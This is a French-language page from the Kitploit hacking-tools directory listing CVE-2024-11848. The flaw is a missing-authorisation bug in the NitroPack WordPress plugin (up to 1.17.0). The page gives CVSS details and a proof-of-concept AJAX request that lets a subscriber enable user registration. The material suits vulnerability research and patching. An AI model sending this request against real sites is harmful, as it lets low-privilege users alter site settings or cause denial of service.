Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-11848 — NitroPack <= 1.17.0 - Absence d'autorisation permettant aux utilisateurs authentifiés (Subscriber+) une mise à jour limitée des options | Kitploit
Outils/GitHubGitHub/randomrobbiebf/cve-2024-11848
Authentification et AutorisationAnalyse des VulnérabilitésExploitationSécurité WebTests d'IntrusionMauvaise Configuration
GitHubrandomrobbiebf/cve-2024-11848

CVE-2024-11848

NitroPack <= 1.17.0 - Absence d'autorisation permettant aux utilisateurs authentifiés (Subscriber+) une mise à jour limitée des options

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-11848

NitroPack <= 1.17.0 - Autorisation manquante pour la mise à jour limitée d'options (Abonné+ authentifié)

Description

Le plugin NitroPack pour WordPress est vulnérable à une modification non autorisée des données en raison d'un manque de vérification des capacités sur l'action AJAX 'nitropack_dismiss_notice_forever' dans toutes les versions jusqu'à 1.17.0 inclus. Cela permet à des attaquants authentifiés, ayant au moins un accès de niveau abonné, de mettre à jour des options arbitraires avec une valeur fixe de '1', ce qui peut activer certaines options (par exemple, activer l'inscription des utilisateurs) ou modifier certaines options d'une manière qui entraîne une condition de déni de service.

Détails

  • Type : plugin
  • Slug : nitropack
  • Version affectée : 1.17.0
  • Score CVSS : 8.1
  • Évaluation CVSS : Élevé
  • Vecteur CVSS : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE : CVE-2024-11848
  • Statut : Actif

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:8929
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_f0174336378e6db874da2237e8c05ac1=subscriber%7C1737110766%7CYhdLxJv5qLyqmSVznKzPOC94NyU9PAMWPeef9cCtINN%7C8c6d11f15397dfb790e700f695c7480bb8267c86130c402afce6080076ccff2d
Content-Length: 88

action=nitropack_dismiss_notice_forever&security=92f60ea3ea&notice_id=users_can_register
Télécharger l’outil